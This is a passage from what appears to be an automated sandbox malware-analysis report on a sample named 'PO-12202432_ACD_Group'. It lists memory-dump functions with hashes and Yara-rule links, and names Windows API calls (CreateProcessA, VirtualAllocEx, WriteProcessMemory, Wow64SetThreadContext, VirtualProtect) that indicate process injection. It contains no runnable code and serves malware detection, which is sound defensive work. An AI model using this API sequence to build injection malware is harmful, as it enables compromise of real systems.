                                                          • Instruction ID: 48e1689fe2141025db65b42caae90cb6bcb6255acdf79a48255202f71b13a9f6
                                                          • Opcode Fuzzy Hash: cdaec5cff03ed5049dff813b311f7c81c417e0f1d82c02e1c90560ad921829f8
                                                          • Instruction Fuzzy Hash: AD924C7090A384AFD72787B58C59B9A7FB8AF03311F1941DBE140DB2E3C6685849CB72
                                                          Function 0660C7C0 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq
                                                          • API String ID: 0-3092978723
                                                          • Opcode ID: b268fc7ee5ee61b617915cfb66155519d5a029dd5b9a6528cda75304f58aa12d
                                                          • Instruction ID: 0d2d0f60fc5b8943eab5437b669f7a0b560a5ea91e4b513430df781415b9bd95
                                                          • Opcode Fuzzy Hash: b268fc7ee5ee61b617915cfb66155519d5a029dd5b9a6528cda75304f58aa12d
                                                          • Instruction Fuzzy Hash: F8521C75A002288FDB68CF69C985BDDBBF6BF88300F1541E9E509A7391DA309D81CF61
                                                          Function 06606D20 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (_]q
                                                          • API String ID: 0-188044275
                                                          • Opcode ID: 4904c5676548d568deaafb57fa7a37140c945d8e72323758c7271232a567f6de
                                                          • Instruction ID: 82499cc0fbab621deb2403e0e40e3be3c21c9d4f54f26f78eeba32c9e5e47d04
                                                          • Opcode Fuzzy Hash: 4904c5676548d568deaafb57fa7a37140c945d8e72323758c7271232a567f6de
                                                          • Instruction Fuzzy Hash: 68226E75A002059FEB58DF68D494A6EBBF6FF88300F158469E905DB391CB71ED41CBA0
                                                          Function 067C26E8 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 067C28C2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 6137ad4d24443b5c61158037375d680f05427f609aa3d725fd61f6ca9dc18da7
                                                          • Instruction ID: 9fd3aa94c155f72ebe38cc76a08a668b53b08b19ae33da5bbf084ff0c0446150
                                                          • Opcode Fuzzy Hash: 6137ad4d24443b5c61158037375d680f05427f609aa3d725fd61f6ca9dc18da7
                                                          • Instruction Fuzzy Hash: 17814571D006198FDB50CFA9C8817EEBBF1BF48324F24852DE869A7255DB749981CF81
                                                          Function 0660D666 Relevance: 1.6, Strings: 1, Instructions: 397COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $]q
                                                          • API String ID: 0-1007455737
                                                          • Opcode ID: 3c8b8b48a2df51abe2faf4ef26671ec2b8500c208317d17e177e078e2993c718
                                                          • Instruction ID: 1b86c599137f18b04f0e688da3089ef78f8772009eb4f59308b9b2816cda4643
                                                          • Opcode Fuzzy Hash: 3c8b8b48a2df51abe2faf4ef26671ec2b8500c208317d17e177e078e2993c718
                                                          • Instruction Fuzzy Hash: 9EE17FB5B042068FEB989FA9D45467FBBA2EF85300F244639E582CB3D1DA34CD45C762
                                                          Function 05AF75B5 Relevance: 1.6, APIs: 1, Instructions: 145fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CopyFileA.KERNEL32(?,?,?), ref: 05AF7705
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2162304348.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5af0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          • Opcode ID: 0af7bc0b29dd20d21e443f309b06d61b29ea331fce3708e34ef376dcc42c4706
                                                          • Instruction ID: ff54986104a8134a468163818d9e808e7cdfb790c4393ae7c4c0bafbcbf0ede2
                                                          • Opcode Fuzzy Hash: 0af7bc0b29dd20d21e443f309b06d61b29ea331fce3708e34ef376dcc42c4706
                                                          • Instruction Fuzzy Hash: 42518A70D106199FDB10DFA9C945BAEBBF2FF48310F148529E855E7284E7789882CB81
                                                          Function 05AF75C0 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CopyFileA.KERNEL32(?,?,?), ref: 05AF7705
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2162304348.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5af0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          • Opcode ID: e990c6caeefdc6c81f39c88e887402547c25cbeb5c6b72821b002d1ff0b05235
                                                          • Instruction ID: a5f2a3a6a7dd2d642985c29b89744a5ed4894c3a4543ef13a4b4f3e160517492
                                                          • Opcode Fuzzy Hash: e990c6caeefdc6c81f39c88e887402547c25cbeb5c6b72821b002d1ff0b05235
                                                          • Instruction Fuzzy Hash: 15518C70D107199FDB10DFA9C845BAEBBF2FF48310F148529E815E7284E7789841CB91
                                                          Function 067C37D0 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 067C3868
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 68110f0dba9034df8f591c7373d5c495603ca75442e95b480caa3d96cb0fd5e5
                                                          • Instruction ID: 68ce73c220d675b50a6aa60ce23026cba63d10100de018669725c07e02a62154
                                                          • Opcode Fuzzy Hash: 68110f0dba9034df8f591c7373d5c495603ca75442e95b480caa3d96cb0fd5e5
                                                          • Instruction Fuzzy Hash: 122137B19003499FCB10DFAAC884BEEBBF5FF48324F54842EE959A7240D7789545CBA0
                                                          Function 067C37D8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 067C3868
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: d7e20670498d2721ab58384652373b628dd3543e79dd40b2fbdfaab79d9ba4da
                                                          • Instruction ID: 3f22657016820b1e7282e5bd28955ed50988778406bc7c6836152b192281d6d7
                                                          • Opcode Fuzzy Hash: d7e20670498d2721ab58384652373b628dd3543e79dd40b2fbdfaab79d9ba4da
                                                          • Instruction Fuzzy Hash: E02128B1D003499FCB10DFAAC885BEEBBF5FF48320F508429E919A7240C7789544CBA0
                                                          Function 067C3EE0 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 067C3F66
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: aac0741b81ccfdd0beaebf01a8972920b2001ede8a7a411591e5d44bb6808486
                                                          • Instruction ID: 8a2e131452453b864f5da6080a611ba0204421494d40b13ece0f27bea25f685d
                                                          • Opcode Fuzzy Hash: aac0741b81ccfdd0beaebf01a8972920b2001ede8a7a411591e5d44bb6808486
                                                          • Instruction Fuzzy Hash: 942145B1D003098FDB10DFAAC4857EEBBF4AF48324F14842ED559A7240CB78A945CFA1
                                                          Function 067DD780 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 067DD7FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 707720ff1fafae365d218df309d2a2b2181eb8de8761c8727bfae16e0d873c5e
                                                          • Instruction ID: 16d3c9206960e528400096b16f657fb84e52af9fc48622b388848557cde5f777
                                                          • Opcode Fuzzy Hash: 707720ff1fafae365d218df309d2a2b2181eb8de8761c8727bfae16e0d873c5e
                                                          • Instruction Fuzzy Hash: 282138B1C003499EDB20DFAAC844BEEFBF5EF48320F54882AD559A7240C7789945CFA1
                                                          Function 067C3EE8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 067C3F66
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 476aa9e127e8243d90aa93782da7ab41866cd283a0ff83ca9de64dab1480fe45
                                                          • Instruction ID: 04985e6ad62a51c56c3a0017db695a5774fadb62599912e4fbf81d4e8983a321
                                                          • Opcode Fuzzy Hash: 476aa9e127e8243d90aa93782da7ab41866cd283a0ff83ca9de64dab1480fe45
                                                          • Instruction Fuzzy Hash: 992115B1D002098FDB10DFAAC485BEEBBF4EF49324F54842ED519A7240CB78A945CFA1
                                                          Function 065A0301 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 065A037C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 3eb5461eef7904a4a245b775b579bb32b17dfe9ce934730654127f9aeb6de555
                                                          • Instruction ID: 113b539f21a70f541e1d78d29baad3fbb5e1d670c2cf2190c4bf7e82f7b86682
                                                          • Opcode Fuzzy Hash: 3eb5461eef7904a4a245b775b579bb32b17dfe9ce934730654127f9aeb6de555
                                                          • Instruction Fuzzy Hash: E22118B1D002099FCB10DFAAC844AEEFBF4FF58314F14841AD459A7250C7759944CFA0
                                                          Function 067DC6F1 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: b3e40d9ff8e042b04090b2b368f4fcb4740c205120cb773a51f608cc56daffe3
                                                          • Instruction ID: 8dbb258d3c7673a924f5f80f3e2f44bda2f2ab980f18bf63848fd2df5390d5d4
                                                          • Opcode Fuzzy Hash: b3e40d9ff8e042b04090b2b368f4fcb4740c205120cb773a51f608cc56daffe3
                                                          • Instruction Fuzzy Hash: 4B119DB19003098ECB10DFAAC8447EEFFF9EF58310F14841AD415A7240CB38A945CBA0
                                                          Function 067DD788 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 067DD7FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 3292cdde1e8bfa93198db74dd0d2a04f409829ecb4f655133319cc6dd3dbbe2a
                                                          • Instruction ID: 9da14bc9881e93351627a601988f087f49ee4c637ad8d2d19635df5ceaef2892
                                                          • Opcode Fuzzy Hash: 3292cdde1e8bfa93198db74dd0d2a04f409829ecb4f655133319cc6dd3dbbe2a
                                                          • Instruction Fuzzy Hash: 772115B1C002099FDB20DFAAC445BEEFBF5EF48320F54842AD519A7240CB789945CFA1
                                                          Function 065A0308 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 065A037C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 793dbca1ec54d8d0387485f86e6dc72b18d5075b1f2fe4b12f99e6c6c1236eb2
                                                          • Instruction ID: 55119c2005262fc3af1f6b18510f912da71a1164a5166cef59a887f29a4439ae
                                                          • Opcode Fuzzy Hash: 793dbca1ec54d8d0387485f86e6dc72b18d5075b1f2fe4b12f99e6c6c1236eb2
                                                          • Instruction Fuzzy Hash: 8E11F4B1D003099FCB10DFAAC844AAEFBF5FF58314F54842AD519A7250C779A944CFA1
                                                          Function 067DC6F8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 22cc831e4e6112c7bf064a3e9c622b41e5fcb8ee96553cac2cf33b97aa682646
                                                          • Instruction ID: 6b7948273930e1c47b50a051bf679599a90769b17c0222e18177887c785b2c1c
                                                          • Opcode Fuzzy Hash: 22cc831e4e6112c7bf064a3e9c622b41e5fcb8ee96553cac2cf33b97aa682646
                                                          • Instruction Fuzzy Hash: 2D1137B19002498ADB10DFAAC445BEEFBF8AF59724F14841AD459A7240CB79A944CBA4
                                                          Function 067C44E8 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 067C455E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 1825dcb3b55fdc9d9eaf095a95379efe76cf8348f102030ac19c410600f722a1
                                                          • Instruction ID: e412709a0405669bf17ea1d19bac10b2f6839e326b1ef6eb2dfe378ced22313f
                                                          • Opcode Fuzzy Hash: 1825dcb3b55fdc9d9eaf095a95379efe76cf8348f102030ac19c410600f722a1
                                                          • Instruction Fuzzy Hash: AF1144B68002499FCB10DFA9D9457EEBBF5FF48324F24881AE519A7250C7399640CFA1
                                                          Function 067C44F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 067C455E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 1ecf3e8d0b23a8bda0ec40abc8bd100f6fceb35f04d2efec286e208cc544df49
                                                          • Instruction ID: 45e8fc6bcca4c45df84579d2833e99517c1301afacf9bf2ccb38d8acf5277386
                                                          • Opcode Fuzzy Hash: 1ecf3e8d0b23a8bda0ec40abc8bd100f6fceb35f04d2efec286e208cc544df49
                                                          • Instruction Fuzzy Hash: 971137B19002499FCB10DFAAD844AEEBFF5FF88324F148419E519A7250C779A540CFA1
                                                          Function 0660C7B0 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq
                                                          • API String ID: 0-3092978723
                                                          • Opcode ID: f74b60b0f7f025c7b0ae523c28de882720744bc363fd9aeecb5f4f9875c1e383
                                                          • Instruction ID: 9268253b697a8cffd625f8db18f5884178af1976e3c746b38b25ce34e08bd6e3
                                                          • Opcode Fuzzy Hash: f74b60b0f7f025c7b0ae523c28de882720744bc363fd9aeecb5f4f9875c1e383
                                                          • Instruction Fuzzy Hash: 0DC18270A002189FDB58DF69C945BDEBBF6FF88700F158199E509AB3A1CA309D81CF61
                                                          Function 066A3229 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M
                                                          • API String ID: 0-2051941792
                                                          • Opcode ID: 2a0a9b87afc5ebcc18230a609696aa54c23a3b87220d83c340e8d06c07b7af48
                                                          • Instruction ID: 27d5071ce5a91ba204b18ccaf72b91add2af839c90628640f4b73043ecdd2db0
                                                          • Opcode Fuzzy Hash: 2a0a9b87afc5ebcc18230a609696aa54c23a3b87220d83c340e8d06c07b7af48
                                                          • Instruction Fuzzy Hash: EBB1F170E08258DFDB94DFA9D444AADBBB1EB89301F10802AE815FB354DB359D55CFA0
                                                          Function 010642B3 Relevance: 1.5, Strings: 1, Instructions: 240COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2148641823.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1060000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q
                                                          • API String ID: 0-3168235125
                                                          • Opcode ID: 99a95f97a9c4aa1762d15ca18cbdcdba423bbded4525930c77d5c81b6ea14a12
                                                          • Instruction ID: 9b1ccd26c8ddf0d913cdda3b6f01ee67bd54b0e8009afdd544faeacc38384df4
                                                          • Opcode Fuzzy Hash: 99a95f97a9c4aa1762d15ca18cbdcdba423bbded4525930c77d5c81b6ea14a12
                                                          • Instruction Fuzzy Hash: DCC1BF74D06269CFEB64CF28C988BADBBF5BB48301F0080EAD489E2255DB745AC5CF51
                                                          Function 0660B8D8 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          • Opcode ID: 491bdb914a8a421e39b9462b2905f08247b84080066e8dbed8237978cfc8a60b
                                                          • Instruction ID: a33dd5058f0770762e58cb448494a9ad3edb2498767f46ab8de03271024dd8d1
                                                          • Opcode Fuzzy Hash: 491bdb914a8a421e39b9462b2905f08247b84080066e8dbed8237978cfc8a60b
                                                          • Instruction Fuzzy Hash: 3CA11034A10218DFDB48EFA4D994D9EBBB2FF89300F118169E415AB3A5DB71EC46CB50
                                                          Function 06602530 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          • Opcode ID: 8f4dfad0c42d0ef0da1f52f43e055a7e42327ec59970f3e341884c4407874170
                                                          • Instruction ID: 58d3e59a1aba92dd02c1db98a23ad49e2a86ce89d0e061dce7fc83af7b9d02b8
                                                          • Opcode Fuzzy Hash: 8f4dfad0c42d0ef0da1f52f43e055a7e42327ec59970f3e341884c4407874170
                                                          • Instruction Fuzzy Hash: 77614935B002018FDB55CF68D868AABBBB9FF85310F1581AAE515DB381C730E956CBD1
                                                          Function 066A5AB0 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M
                                                          • API String ID: 0-2051941792
                                                          • Opcode ID: 59f79167ba7a7f3a8431012c6a0453f36f51d30818c07716abc9cead071688b7
                                                          • Instruction ID: 59a0dae7e250f87b3ee14a8c168aff14b434a8327c2f06aaf39fa06674bd9ffa
                                                          • Opcode Fuzzy Hash: 59f79167ba7a7f3a8431012c6a0453f36f51d30818c07716abc9cead071688b7
                                                          • Instruction Fuzzy Hash: E681FF74E05318CFDB94DFA9D9946AEBBB2FB48301F10812AD506AB294D7705D46CFA0
                                                          Function 06601570 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: paq
                                                          • API String ID: 0-3273118895
                                                          • Opcode ID: eb05afa1a9a4dcf8c474fde36a1e795c739c10c1cc5a8bb70c0362e09b6a2ac9
                                                          • Instruction ID: b70e1807bfdca73d459c0d7ac812699f71f742b49843aed8a8c6db97f1114e63
                                                          • Opcode Fuzzy Hash: eb05afa1a9a4dcf8c474fde36a1e795c739c10c1cc5a8bb70c0362e09b6a2ac9
                                                          • Instruction Fuzzy Hash: 26515F76600100AFCB499FA8DD04D6ABFE3FF8D31471584D9E2099B276DA32DC21DB50
                                                          Function 06601560 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: paq
                                                          • API String ID: 0-3273118895
                                                          • Opcode ID: b0c51344853e613a73990cab41e3314e64a59459f47066df3d672957b8618d07
                                                          • Instruction ID: fc111df4da7d5d762000853dff232085bdab00e4097fcee5a3c4ac9d31caaa8a
                                                          • Opcode Fuzzy Hash: b0c51344853e613a73990cab41e3314e64a59459f47066df3d672957b8618d07
                                                          • Instruction Fuzzy Hash: D6516F76600100AFCB4A9F98DD04D66BFE6FF8D32471A85D5F2098F276D636D821DB90
                                                          Function 0660F577 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          • Opcode ID: de5eed13212ce9cfc595c17b962a30b9df69621dc871ed170e0281ea323d710b
                                                          • Instruction ID: 578515fbf56c0260e3617cc7baa0fcea268a0573a0a172f21a76bfb957293256
                                                          • Opcode Fuzzy Hash: de5eed13212ce9cfc595c17b962a30b9df69621dc871ed170e0281ea323d710b
                                                          • Instruction Fuzzy Hash: 54418330B106148FDB98AB69D854A6F7BAAAFC9700F10802DD4129B3E4CF759C46CB95
                                                          Function 066A5AA2 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M
                                                          • API String ID: 0-2051941792
                                                          • Opcode ID: 0ad8d1ac591ebab9f6c019f3ee82fb352263167b67797f809c70e4e732e58200
                                                          • Instruction ID: 843948985193d041c163633c88652b88aca59ea9bb67a0f39b4a8e5dc5130ef1
                                                          • Opcode Fuzzy Hash: 0ad8d1ac591ebab9f6c019f3ee82fb352263167b67797f809c70e4e732e58200
                                                          • Instruction Fuzzy Hash: 83513474E05308CFDB94DFA9D894AAEBBB2FF49301F14812AD506A7291D7705D46CFA0
                                                          Function 066A5BE9 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
